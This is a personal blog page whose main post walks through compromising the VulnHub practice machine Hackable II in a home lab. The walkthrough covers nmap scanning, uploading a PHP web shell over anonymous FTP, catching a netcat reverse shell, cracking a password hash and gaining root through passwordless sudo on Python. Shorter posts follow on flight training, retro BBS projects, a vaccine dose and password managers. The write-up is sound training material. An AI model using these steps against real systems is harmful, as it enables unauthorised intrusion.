Monday, July 26, 2021

CaptureTheFlag - Hackable II

I've recently regained interest in cyber security, so have been practicing on some of the CtF machines available on VulnHub. I started with some easy machines, as it's been quite some time since I've played with any of this, so after doing a couple, using walktroughs, I downloaded Hackable II and imported it into VirtualBox, and set the network up as "Internal" on the same network as my Kali VirtualBox. 

The first thing I did was run nmap to discover the IP of the new host:
sudo nmap 10.38.1.1/24
This revealed several servers running on the box:
Nmap scan report for 10.38.1.7
Host is up (0.00036s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B5:56:29 (Oracle VirtualBox virtual NIC)

Hmmm... ftp, ssh, and a web server... The web server has the default apache2 site, which doesn't reveal anything too interesting... Apache2 Ubuntu Default Page... Nothing too extaordinary. So, back to nmap:

sudo nmap --script http-enum.nse 10.38.1.7

This revealed a folder named /files/ on the web server. So, I look at it in a web browser and see a file listing. So I attempt an anonymous ftp to the server, and, sure enough, it's the same folder listing. Could they have allowed anonymous uploads? I have a short text file, temp.txt, for just such tests...

put temp.txt

Success! And, if I refresh the web browser, the file shows up. So, I delete that file, and upload a php web shell, which points to my kali box:

put shell.php 

And on my kali box:

 nc -nlvp 1234

And then I refesh the page in Firefox and switch back to my netcat session and check to see what users are on this box...Interesting...

$ cd /home
$ ls -lta
total 16
drwxr-xr-x 4 shrek shrek 4096 Jul 26 21:13 shrek
drwxr-xr-x 23 root root 4096 Nov 26 2020 ..
drwxr-xr-x 3 root root 4096 Nov 26 2020 .
-rw-r--r-- 1 root root 43 Nov 26 2020 important.txt

 One user, shrek, and hmmm...

$ cat important.txt
run the script to see the data

/.runme.sh

Yeah... Not gonna run that... But...

$ cat /.runme.sh
!/bin/bash
echo 'the secret key'
sleep 2
echo 'is'
sleep 2
echo 'trolled'
sleep 2
echo 'restarting computer in 3 seconds...'
sleep 1
echo 'restarting computer in 2 seconds...'
sleep 1
echo 'restarting computer in 1 seconds...'
sleep 1
echo '⡴⠑⡄⠀⠀⠀⠀⠀⠀⠀ ⣀⣀⣤⣤⣤⣀⡀
⠸⡇⠀⠿⡀⠀⠀⠀⣀⡴⢿⣿⣿⣿⣿⣿⣿⣿⣷⣦⡀
⠀⠀⠀⠀⠑⢄⣠⠾⠁⣀⣄⡈⠙⣿⣿⣿⣿⣿⣿⣿⣿⣆
⠀⠀⠀⠀⢀⡀⠁⠀⠀⠈⠙⠛⠂⠈⣿⣿⣿⣿⣿⠿⡿⢿⣆
⠀⠀⠀⢀⡾⣁⣀⠀⠴⠂⠙⣗⡀⠀⢻⣿⣿⠭⢤⣴⣦⣤⣹⠀⠀⠀⢀⢴⣶⣆
⠀⠀⢀⣾⣿⣿⣿⣷⣮⣽⣾⣿⣥⣴⣿⣿⡿⢂⠔⢚⡿⢿⣿⣦⣴⣾⠸⣼⡿
⠀⢀⡞⠁⠙⠻⠿⠟⠉⠀⠛⢹⣿⣿⣿⣿⣿⣌⢤⣼⣿⣾⣿⡟⠉
⠀⣾⣷⣶⠇⠀⠀⣤⣄⣀⡀⠈⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡇
⠀⠉⠈⠉⠀⠀⢦⡈⢻⣿⣿⣿⣶⣶⣶⣶⣤⣽⡹⣿⣿⣿⣿⡇
⠀⠀⠀⠀⠀⠀⠀⠉⠲⣽⡻⢿⣿⣿⣿⣿⣿⣿⣷⣜⣿⣿⣿⡇
⠀⠀ ⠀⠀⠀⠀⠀⢸⣿⣿⣷⣶⣮⣭⣽⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⣀⣀⣈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇
⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿
shrek:cf4c2232354952690368f1b3dfdfb24d'

So, off to https://crackstation.net/ and the password for shrek is, apparently, onion. This was also the title of the file listing page in the web browser. Clever clue ;) So... Kill the reverse shell and login via ssh and see what we can do with sudo...

$ ssh shrek@10.38.1.7
shrek@10.38.1.7's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-194-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage


88 packages can be updated.
68 updates are security updates.


Last login: Mon Jul 26 21:09:32 2021 from 10.38.1.4
shrek@ubuntu:~$ sudo -l
Matching Defaults entries for shrek on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shrek may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/python3.5

Wait! What?! /usr/bin/python3.5 can be executed as root with no password?! Here's a quick and dirty sh.py:

root@ubuntu:~# cd /root
root@ubuntu:/root# ls -lta
total 32
-rw-------  1 root root   13 Jun 15 16:01 .bash_history
drw-------  4 root root 4096 Jun 15 13:35 .
-rw-------  1 root root 1581 Jun 15 13:28 root.txt
drwxr-xr-x 23 root root 4096 Nov 26  2020 ..
drw-------  2 root root 4096 Nov 25  2020 .cache
drw-------  2 root root 4096 Nov 25  2020 .nano
-rw-------  1 root root 3106 Oct 22  2015 .bashrc
-rw-------  1 root root  148 Aug 17  2015 .profile
root@ubuntu:/root# cat root.txt
                            ____
        ____....----''''````    |.
,'''````            ____....----; '.
| __....----''''````         .-.`'. '.
|.-.                .....    | |   '. '.
`| |        ..:::::::::::::::| |   .-;. |
 | |`'-;-::::::::::::::::::::| |,,.| |-='
 | |   | ::::::::::::::::::::| |   | |
 | |   | :::::::::::::::;;;;;| |   | |
 | |   | :::::::::;;;2KY2KY2Y| |   | |
 | |   | :::::;;Y2KY2KY2KY2KY| |   | |
 | |   | :::;Y2Y2KY2KY2KY2KY2| |   | |
 | |   | :;Y2KY2KY2KY2KY2K+++| |   | |
 | |   | |;2KY2KY2KY2++++++++| |   | |
 | |   | | ;++++++++++++++++;| |   | |
 | |   | |  ;++++++++++++++;.| |   | |
 | |   | |   :++++++++++++:  | |   | |
 | |   | |    .:++++++++;.   | |   | |
 | |   | |       .:;+:..     | |   | |
 | |   | |         ;;        | |   | |
 | |   | |      .,:+;:,.     | |   | |
 | |   | |    .::::;+::::,   | |   | |
 | |   | |   ::::::;;::::::. | |   | |
 | |   | |  :::::::+;:::::::.| |   | |
 | |   | | ::::::::;;::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | |:::::::::+:::::::::| |   | |
 | |   | ::::::::;+++;:::::::| |   | |
 | |   | :::::::;+++++;::::::| |   | |
 | |   | ::::::;+++++++;:::::| |   | |
 | |   |.:::::;+++++++++;::::| |   | |
 | | ,`':::::;+++++++++++;:::| |'"-| |-..
 | |'   ::::;+++++++++++++;::| |   '-' ,|
 | |    ::::;++++++++++++++;:| |     .' |
,;-'_   `-._===++++++++++_.-'| |   .'  .'
|    ````'''----....___-'    '-' .'  .'
'---....____           ````'''--;  ,'
            ````''''----....____|.'

invite-me: https://www.linkedin.com/in/eliastouguinho/

And there it is! It took me longer to write this up than to get the root flag on this box. Next time, maybe something a little harder? ;)

Monday, June 7, 2021

Flying High Again

Something I've always wanted to do, since I was a child, is to become a pilot. My wife bought be an incredible package to start me on that journey, and so far I have 2.5 hrs and three landings in a C172, and .8hr and one landing in a CTLS Light-sport. I much prefer the C172 ;) I've also taken a complete ground school and earned my endorsement to take the FAA written exam. I'll probably take an FAA medical exam soon, and will continue to practice for the FAA written, until I'm a little more confident. I mean, I'm sure I can pass it, but higher scores might make a difference on the oral exam before the checkride ;) It may be a small start, but it is enough for me to get the bug for flying ;) Since my flights so far have been "discovery" flights, I still need to decide on a flight school. I prefer the one where I have the time in the Cessna, but it is so far away compared to the other. I still need to check out the one in Fairfield County, and the one at Bolton Field... Looking for the same connection with the instructor as the one I've been using at Middletown...

Friday, June 4, 2021

BBS Projects

Wow! It's been way too long since my last post, but here are updates on a couple of recent projects: I have obtained an 8-port Digiboard, and plan on installing it into either one of my Tandy 1000SXs, or, if there are too many memory contraints, a Compaq 386 that I aquired awhile back, and setting up an 8-line DLX BBS on it. I don't expect a simple 8-line chat board to get much use these days, but, I really want to try it ;) I'll be using a Raspberry Pi 4 and tcpser, along with 8 USB serial ports, as multiple WiFi modems. I also received my CoCo SDC for my Tandy CoCo 2, and plan on FINALLY finishing a project I started in 2008 to get CoBBS going. The big difference now is I will be using a CoCo 2 instead of a CoCo 3, which is what it was originally written for, and I have many more options for a modem emulator. I am most likely to use an esp32 set up as a WiFi modem. Finally, I have a WWiV board running under Linux, but "languishing" is probably a better term. I would much rather run an old 4.22 board than a current 5.x board, and have been considering figuring out how to get the current networking package working with the old BBS package. Once I do that, I'm considering also setting up a VBBS 6.x board, and I prefer that over 7 or VA. I also have an Apple2e and a C64 sitting idle. I might set up BBS packages on them as well. Time is at a bit of a premium, though, as I am doing some pilot ground school and training to become a private pilot.

Wednesday, March 31, 2021

Vaccine round one

I got round one of the Moderna Covid-19 vaccine yeserday morning, and aside from some soreness and tenderness at the injection site, which started a couple of hours after the shot, there haven't been any side effects. From what I hear, it's the second round that usually has the side effects, so I'll update in a few weeks after I've had it...

Wednesday, February 17, 2021

Farewell, LastPass!

I have been using the free tier of Lastpass for some time now, but in their infinite wisdom, they have decided to restrict the free tier to a single type of device. This means I can either use it in a browser on my desktop, or on my Android phone, but not both. Ability to easily sync across devices and browsers is what gave LastPass a leg up, and what made me settle on it in the first place. It looks like Bitwarden is the new winner of that contest. Installed it in Chrome and on my phone, and working well so far.